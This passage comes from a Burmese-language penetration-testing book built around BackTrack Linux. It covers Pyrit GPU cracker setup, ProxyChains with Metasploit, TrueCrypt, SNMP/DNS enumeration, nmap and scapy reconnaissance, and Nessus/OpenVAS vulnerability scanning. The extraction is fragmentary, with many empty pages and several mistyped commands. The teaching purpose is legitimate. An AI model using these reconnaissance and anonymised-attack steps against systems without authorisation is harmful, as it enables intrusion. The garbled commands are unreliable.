ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
make
make install
cd /tmp/
cd pyrit_src/pyrit
cd /tmp/pyrit_src/cpyrit_opencl
cd /tmp/pyrit_source/cpyrit_calpp
vi setup.py
ထို႕အျပင္
CALPP_INC-DIRS.append(os.path.join(CALPP_INC_DIR, ‘include/CAL’))
မွတ္ရန္။ ။ အသင့္ျဖစ္ေသာ CAL++ Device မ်ားႏွင့္ CPU Core မ်ားကို သိရိွႏိုင္ရန္ ေအာက္ပါ
Command မ်ားကိုအသံုးျပဳႏိုင္ပါသည္။
pyrit list_cores
pyrit benchmark
38 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁။ CPU architecture ကိုလိုက္၍ Nvidia Developer Display Driver ကို Download ျပဳလုပ္ရပါမည္။
cd /tmp/
wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/drivers/NVIDIA-
linux-x86_ 64-285.05.33.run
wget
http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.2
8_linux_64_ubuntu11.04.run
echo PATH=$PATH:/opt/cuda/bin>>~/.bashrc
source ~/.bashrc
ldconfig
cd pyrit_src/pyrit
cd /tmp/pyrit_src/cpyrit_cuda
40 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
nvcc –v
pyrit benchmark
apt-get update
apt-get upgrade
apt-get dist-upgrade
၄။ ေအာက္ေဖာ္ျပပါ Website တြင္ Registering ျပဳလုပ္၍ Nessus အတြက္ Activation code ကိုရရိွ
ႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 41
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
http://www.nessus.org/prodjucts/nessus/nessus-plugins/obtain-an-activation-code
/opt/nessus/sbin/nessus-adduser
/etc/inti.d/nessusd start
42 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Setting up ProxyChains
ProxyChains ဆိုသည္မွာ Proxy တစ္ခုကိုျဖတ္သန္း၍ Application တစ္ခုမွ မည္သည္႕ TCP
Connection ကိုမဆို ခြင့္ျပဳေပးႏိုင္ေသာ Program တစ္ခုပင္ျဖစ္ပါသည္။ ယခုအပိုင္းတြင္ Receiver ႏွင့္
Sender မွ တိုက္ရိုက္ခ်ိတ္ဆက္မႈကို ကန္႕သတ္ေပးႏိုင္ေသာ အသံုးျပဳသူမွ သတ္မွတ္ထားေသာ Proxies
စာရင္းမ်ားကိုျဖတ္သန္း၍ Connection တစ္ခုကိုသတ္မွတ္ေပးႏိုင္ေသာ အျခင္းအရာမ်ားကို ေဖာ္ျပေပး
မည္ ျဖစ္ပါသည္။ ProxyChains ကိုစတင္လုပ္ေဆာင္ရန္အတြက္
vim /etc/proxychains.conf
မ်က္ပြင့္စာေပ 43
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
proxyresolv www.targethost.com
proxychains msfconsole
44 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Directory Encryption
ယခုအခန္း၏ေနာက္ဆံုးအပိုင္းအရ Information Privacy အေၾကာင္းကိုေဖာ္ျပေပးမည္ျဖစ္ပါ
သည္။ ထိုအပိုင္းတြင္ TrueCrypt ကိုအသံုးျပဳ၍ အေရးႀကီးေသာအခ်က္အလက္မ်ားႏွင့္ လွ်ိဳ႕၀ွက္ Digital
Information မ်ားကို Encryption Key ျဖင့္ ေဖ်ာက္ထား၍ ရပံုကိုလုပ္ေဆာင္ၾကည္႕ၾကမည္ျဖစ္ပါသည္။
မ်က္ပြင့္စာေပ 45
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၃။ TrueCrypt Volume Creation Wizard ကိုစတင္ႏိုင္ရန္အတြက္ Create Volume တြင္ Click ႏိွပ္ပါ။
46 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၆။ Select File… ဟူေသာ ခလုတ္တြင္ Click ႏိွပ္ရမည္ျဖစ္ၿပီး ထိုမွ TrueCrypt Volume အသစ္၏ Name
ႏွင့္ Location ကို သတ္မွတ္ေပးရပါမည္။ ထို႕ေနာက္ ၿပီးဆံုးေသာအခါတြင္ Save တြင္ Click ႏိွပ္ပါ။
၇။ Next တြင္ Click ႏိွပ္ပါ။ ထို႕ေနာက္ အသံုးျပဳလိုေသာ Encryption ႏွင့္ Hash Algorithm တို႕ကို
ေရြးခ်ယ္ပါ။
၁၅။ ထုိ Encrypt ျပဳလုပ္ထားေသာ Volume ကို Decrypt ျပဳလုပ္ရန္အတြက္ List မွ Slot တစ္ခုကို
ေရြးခ်ယ္ေပးပါ။ ထို႕ေနာက္ Select File… တြင္ Click ႏိွပ္ကာ Encrypt ျပဳလုပ္ထားေသာ volume ကို
ဖြင့္ႏိုင္မည္ျဖစ္ပါသည္။
မ်က္ပြင့္စာေပ 47
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
48 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Chapter 3
Information Gathering
အခ်က္အလက္ စုေဆာင္းျခင္း
မ်က္ပြင့္စာေပ 49
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Introduction
အျခားေသာထိုးေဖာက္မႈလုပ္ငန္းစဥ္မ်ားကို မလုပ္ေဆာင္မီ အေရးႀကီးေသာ လုပ္ေဆာင္ခ်က္တစ္ရပ္မွာ
အခ်က္အလက္မ်ားစုေဆာင္းျခင္းပင္ျဖစ္သည္။ ထိုးေဖာက္မ၀င္ေရာက္မီတြင္ လိုအပ္ေသာ တိုက္ခိုက္မည္႕
Target အတြက္ အေျခခံအခ်က္အလက္မ်ားကိုစုေဆာင္းျခင္းလုပ္ငန္းစဥ္ကို လုပ္ေဆာင္ရ မည္ျဖစ္သည္။
အခ်က္အလက္မ်ား ပိုမိုစုေဆာင္းမိေလေလ ထိုးေဖာက္၀င္ေရာက္သည္႕အခါတြင္ ပိုမိုလြယ္ကူေလေလ
ျဖစ္သည္႕အတြက္ အခ်က္အလက္မ်ားကိုစုေဆာင္းျခင္းအေလ့အထကိုေလ့က်င့္ေပးရန္လိုအပ္လွပါသည္။
ယခုအခန္းတြင္ေလ့လာရမည္႕ အေၾကာင္းအရာမ်ားမွာ
- Service enumeration
- Determining the network range
- Identifying active mahcines
- Finding open ports
- Operating system fingerprinting
- Service fingerprinting
- Threat assessment with Maltego
- Mappin the network တို႕ျဖစ္ပါသည္။ အထက္တြင္ေဖာ္ျပထားေသာေခါင္းစဥ္ခြဲမ်ားကို အေသးစိပ္
ေဖာ္ျပေပးထားပါသည္။
Service enumeration
ယခုအပိုင္းတြင္ Service enumeration tricks မ်ားစြာကိုလုပ္ေဆာင္ၾကည္႕ၾကမည္ျဖစ္ပါသည္။
Enumeration ဆိုသည္မွာလုပ္ေဆာင္ခ်က္တစ္ခုျဖစ္ၿပီး ၄င္းလုပ္ေဆာင္ခ်က္သည္ ကြန္ယက္တစ္ခုမွ
အခ်က္အလက္မ်ားကို စုေဆာင္းျခင္းျဖစ္သည္။ ယခုအပိုင္းတြင္ DNS enumeration ႏွင့္ SNMP
enumeration အေၾကာင္းကိုဥပမာေပး၍ ေဖာ္ျပေပးမည္ျဖစ္သည္။ DNS enumartion ဆိုသည္မွာလည္း
လုပ္ေဆာင္ခ်က္တစ္ခုပင္ျဖစ္ၿပီး အားလံုးေသာ DNS Server မ်ားႏွင့္ Organization တစ္ခုအတြက္ DNS
entries မ်ားကို Locating ျပဳလုပ္ေပးႏိုင္သည္။ DNS enumeration သည္ အဖြ႕ဲ အစည္းတစ္ခု၏
50 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 51
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /pentest/enumeration/snmp/snmpenum
Installed Software
Users
Uptime
Hostname
Discs
Running Processes, ႏွင့္အျခားေသာ အခ်က္အလက္မ်ား ျဖစ္ႏိုင္ပါသည္။
52 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၆။ အျခားေသာ Command ကိုအသံုးျပဳျခင္းျဖင့္ Window host သည္ snmpwalk ျဖစ္၊ မျဖစ္ကို စစ္ေဆးရန္
အသံုးျပဳႏိုင္ပါသည္။ Snmpwalk သည္ SNMP application တစ္ခုျဖစ္ၿပီး ၄င္းသည္ SNMP GETNEXT
request အတြက္ ကြန္ယက္တစ္ခုလံုး၏ Information Tree ကို Query လုပ္ရန္အတြက္ အသံုးျပဳႏိုင္သည္။
ထိုသို႕ျပဳလုပ္ရန္အတြက္ Command line မွ ေအာက္ပါ Command ကိုအသံုးျပဳႏိုင္ပါ သည္။
snmpwalk –c public 192.168.10.200 –v 1 | grep tcpConnState | cut –d”.” –f6 | sort –nu
21
25
80
443
cd /pentest/enumeration/snmp/snmpcheck/
မ်က္ပြင့္စာေပ 53
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd/ pentest/enumeration/dns/fierce/
၁၂။ SMTP server ေပၚမွ User မ်ားမွ SMTS enumeration ကိုစတင္ရန္အတြက္ ေအာက္ပါ Command
ကိုအသံုးျပဳရပါသည္။
54 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
netmask –s targethost.com
scapy
မ်က္ပြင့္စာေပ 55
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
res,unans=traceroute(["www.google.com","www.backtrack-
linux.org","www.targethost.com"],dport=[80,443],maxttl=20, retry=-2)
res.graph()
res.graph(target="> /tmp/graph.svg")
56 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
res.trace3D()
Exit ()
အထက္ပါလုပ္ေဆာင္ခ်က္မ်ားမွ အလုပ္လုပ္ေဆာင္မႈမ်ားကိုေလ့လာၾကည္႕လွ်င္
မ်က္ပြင့္စာေပ 57
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
58 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
nmap 192.168.56.102
မ်က္ပြင့္စာေပ 59
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
nmap –p 22 192.168.56.*
60 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 61
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Nmap –o 192.168.56.102
62 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Service Fingerprinting
သတ္မွတ္ထားေသာ Port မ်ားတြင္ ေအာင္ျမင္ေသာ ထိုးေဖာက္မႈအျဖစ္ လုပ္ေဆာင္ႏိုင္ေစရန္ အတြက္
Service fingerprinting လုပ္ေဆာင္ခ်က္ကို လုပ္ေဆာင္ေပးရန္လိုအပ္ပါလိမ့္မည္။ ထိုလုပ္ေဆာင္ခ်က္
သည္ OS fingerprinting process ၏ေနာက္ဆက္တြလ
ဲ ုပ္ေဆာင္ရေသာ လုပ္ငန္းစဥ္တစ္ရပ္ျဖပ္၍
သိရိွထားေသာ OS ေပၚတြင္ ေမာင္းႏွင္ထားေသာ Service မ်ားကို သိရိွႏိုင္ေစရန္အတြက္ အသံုးျပဳႏိုင္
မည္ျဖစ္သည္။
64 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 65
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၂။ အေသးစိပ္က်ေသာ Login ကို ၀င္ေရာက္ႏိုင္ရန္အတြက္ Startup Wizard မွ Next တြင္ Click ႏိွပ္ပါ။
၃။ Login Credential ကို Validate ျဖစ္ေစရန္အတြက္ Next တြင္ click ႏိွပ္ပါ။ Validate ျဖစ္သြားေသာ
အခါတြင္ ေရွ႕ဆက္ရန္ Next ကိုေရြးခ်ယ္ေပးရပါမည္။
66 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 67
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၆။ စတင္ရန္အတြက္ Component Palette မွ Domain တစ္ခုလံုးကို Drag and drop ျပဳလုပ္၍ New
Graph document ေပၚသို႕ ဖိဆေ
ြဲ ပးပါ။
၇။ တည္ေဆာက္ၿပီး Domain တစ္ခုလံုးကို Click ႏိွပ္ၿပီး Property View ေပၚတြင္ရိွေသာ Domain Name
Property ကိုလည္း ျပင္ဆင္ေပးျခင္းျဖင့္ Domain Name Target ကိုသတ္မွတ္ေပးႏိုင္ပါသည္။
68 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 69
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာရလွ်င္
70 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 71
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
72 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 73
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၆။ Entity မ်ားကို Link ခ်ိတ္ရန္အတြက္ Entity တစ္ခုမွ တစ္ခုသို႕ Line အတိုင္း ဆြထ
ဲ ည္႕ေပးရပါမည္။
ေအာက္ေဖာ္ျပပါပံုကိုၾကည္႕ပါ။
74 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 75
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
76 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Chapter 4
Vulnerability Identification
အားနည္းခ်က္ယိုေပါက္ ရွာေဖြျခင္း
မ်က္ပြင့္စာေပ 77
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Introduction
တိုက္ခိုက္လိုေသာ Target ေပၚတြင္ အားနည္းခ်က္၊ ယိုေပါက္မ်ားရွာေဖြရျခင္းသည္ ကၽြမ္းက်င္သူ မ်ား၊
Ethical Hacker မ်ားအတြက္ ပ်င္းရိျငီးေငြ႕ဖြယ္ေကာင္းေသာအလုပ္မ်ားထဲမွ တစ္ခုဟု ဆိုႏိုင္ေသာ္ လည္း
၄င္းသည္ပင္ အေရးအႀကီးဆံုးလုပ္ေဆာင္ရေသာ အလုပ္မ်ားထဲမွ တစ္ခုလည္း ျဖစ္ေနေစပါသည္။
Linux Vulnerabilities
Windows Vulnerabilities
Local Security checks
Network Service Vulnerabilities တို႕ပင္ျဖစ္ပါသည္။ ယခုအခန္းတြင္ ပါ၀င္ေသာ ေလ့လာ
ရမည္႕ အပိုင္းခြဲမ်ားကို ေအာက္တြင္ ေဖာ္ျပထားပါသည္။ ယင္းတို႕မွာ
Installing, Cnfiguring, and Starting Nessus
Nessus – finding local vulnerabilities
Nessus – finding network vulnerabilities
Nessus – finding linux-specific vulnerabilities
Nessus – finding Windows-specific vulnerabilities
Installing, Configuring, and Starting OpenVAS
OpenVAS – finding local vulnerabilities
OpenVAS – finding network vulnerabilities
OpenVAS – finding linux specific vulnerabilities
OpenVAS – finding Windows-specific Vulnerabilities တို႕ျဖစ္ပါသည္။
ထိုေၾကာင့္ ယခုအားနည္းခ်က္ရွာေဖြျခင္းအခန္းကို စတင္ေလ့လာၾကပါစို႕
78 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
စတင္အသံုးျပဳရန္အတြက္ Internet Connection ႏွင့္ Nessus Home Feed အတြက္ License အျဖစ္
အသံုးျပဳထားရန္လိုအပ္ပါမည္။ ထို႕ေၾကာင့္ လုပ္ေဆာင္ခ်က္မ်ားကို အဆင့္အလိုက္ ေလ့လာၾကည္႕ၾက
ပါမည္။
/etc/init.d/nessusd start
အကယ္၍ ေအာက္တင
ြ ္ေဖာ္ျပထားေသာပံုအတိုင္း Error Message ေပၚလာလွ်င္ ယခုအပိုင္း၏ ေအာက္တြင္ ေရးသား
ထားေသာ မွတ္ရန္ ဟူေသာ အဆင့္အတိုင္း ျပဳလုပ္ေပးၾကပါရန္။
/opt/nessus/sbin/nessus-adduser
၈။ Password ကိုႏွစ္ႀကိမ္ရိုက္ထည္႕ေပးရပါမည္။
/etc/init.d/nessusd start
ယခုအပိုင္းတြင္ Termianl Window ကိုဖြင့္၍ Repository မွတစ္ဆင့္ Nessus ကို Install ျပဳလုပ္ျခင္းကို
ေဖာ္ျပခဲ့ပါသည္။ ေနာက္ပိုင္းတြင္ Nessus ကိုစတင္ၿပီး Program ကို utilize ျပဳလုပ္ရန္ feed certificate
ကို Install ျပဳလုပ္ရျခင္းကိုလည္း ေဖာ္ျပေပးခဲ့ပါသည္။
Nessus ကို Register လုပ္ရန္အတြက္ Valid License ရိွရမည္ျဖစ္ၿပီး ၄င္းကို http:// www.tenable.com
/products/nessus/nessus-homefeed တြင္ရယူႏိုင္ပါသည္။ သတိထားရန္အခ်က္ မွာ ထိုသို႕ရယူရန္
အတြက္ Flash Player ရိွေသာ Browser တြင္သာ ရယူႏိုင္မည္ျဖစ္ေသာေၾကာင့္ Firefox ကဲ့သို႕ေသာ
Browser မ်ိဳးတြင္မလုပ္ေဆာင္မီ Flash Plugin ကိုထည္႕သြင္းရမည္ျဖစ္ပါသည္။ Flash Plugin ရယူလိုပါက
http://www.backtrack-linux.org/wiki/index.php/Install_Flash_Player သို႕သြားေရာက္ရယူႏိုင္ပါ
သည္။
မ်က္ပြင့္စာေပ 81
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
- Windows XP
- Windows 7
- Metasploitable 2
- Any other flavor of Linux တိ႕ု ျဖစ္ပါသည္။
ယခုအပိုင္းကို စတင္လုပ္ေဆာင္ရန္အတြက္ Mozilla Firefox ကဲ့သ႕ို ေသာ Web Browser ကို အသံုးျပဳႏိုင္
ပါသည္။ ယခုအပိုင္းတြင္ Local Vulnerabilities မ်ားကိုရွာေဖြျခင္းကို ေဖာ္ျပေပးမည္႕ျဖစ္သည္႕အတြက္
ေအာက္တြင္ေဖာ္ျပထားေသာ လုပ္ေဆာင္ခ်က္မ်ားကို အဆင့္အလိုက္ေဖာ္ျပေပးထားပါသည္။
82 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၅။ Plugin Tab ေပၚတြင္ Disable All ႏွင့္ ေအာက္တြင္သတ္မွတ္ထားေသာ Vulnerabilities မ်ားကို ေရြး
ခ်ယ္ေပးႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 83
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
84 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 85
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁၃။ Reports Main Menu ေပၚမွ Download Report တြင္ Click ျပဳလုပ္ႏိုင္ပါသည္။
Windows XP
Windows 7
Metasploitable 2
Network firewall or router
Any other flavor of Linux
86 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၅။ Plugins Tab တြင္ Disable All ကို Click ႏိွပ္ၿပီး ေအာက္တြင္ေဖာ္ျပထားေသာ Vulnerablities မ်ားကို
သာေရြးခ်ယ္ေပးထားရပါမည္။ ၄င္းတို႕မွာ
CISCO
DNS
Default Unix Accounts
FTP
မ်က္ပြင့္စာေပ 87
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Firewalls
Gain a shell remotely
General
Netware
Peer-To-Peer File Sharing
Policy Compliance
Port Scanners
SCADA
SMTP Problems
SNMP
Service Detection
Settings တိ႕ု ျဖစ္သည္။
88 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 89
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
90 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Metasplotiable 2
Any other flavor of linux တိ႕ု ျဖစ္ေစရပါမည္။
မ်က္ပြင့္စာေပ 91
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Backdoors
Brute Force Attacks
CentOS Local Security Checks
DNS
Debian Local Security Checks
Default Unix Accounts
Denial of Service
FTP
Fedora Local Security Checks
Firewalls
FreeBSD Local Security Checks
Gain a shell remotely
General
Gentoo Local Security Checks
HP-UX Local Security Checks
92 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 93
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
94 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
DNS
96 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Databases
Denial of Service
FTP
SMTP Problems
SNMP
Settings
Web Servers
Windows
Windows: Microsoft Bulletins
Windows: User management တို႕ျဖစ္ၾကပါသည္။
၇။ Main Menu ေပၚမွ Scans Menu Option တြင္ ထပ္မံ Click ႏိွပ္ပါ။
မ်က္ပြင့္စာေပ 97
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
98 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 99
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /pentest/misc/openvas/
openvas-mkcert
100 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
openvas-nvt-sync
အထက္ပါ Command သည္ လက္ရိွ NVT Feed မွ OpenVAS NVT database ကို Sync ျပဳလုပ္ရန္ျဖစ္
ပါသည္။ ၄င္းသည္ ေခတ္အမီွဆံုး Vulnerability စစ္ေဆးျခင္းကို ျပဳလုပ္ၿပီး တစ္လက္စတည္းအေနျဖင့္
Update ကိုပါ တစ္ခါတည္း ျပဳလုပ္ေပးပါလိမ့္မည္။
openvas-mkcert-client –n om –i
openvasmd –rebuild
၄င္း Command အရ Client Certificate ကို ထုတ္ေပးမည္ျဖစ္ၿပီး Database ကိုလည္း အသီးသီး ျပန္လည္
တည္ေဆာက္ေပးပါလိမ့္မည္။
openvassd
မ်က္ပြင့္စာေပ 101
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
openvasmd --rebuild
openvasmd --backup
openvas-adduser
102 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မွတ္ရန္။ ။9392 သည္ Web Browser အတြက္ အႀကံျပဳထားေသာ Port ျဖစ္ေသာ္လည္း မိမိ၏
ဆႏၵျဖင့္ ေရြးခ်ယ္အသံုးျပဳႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 103
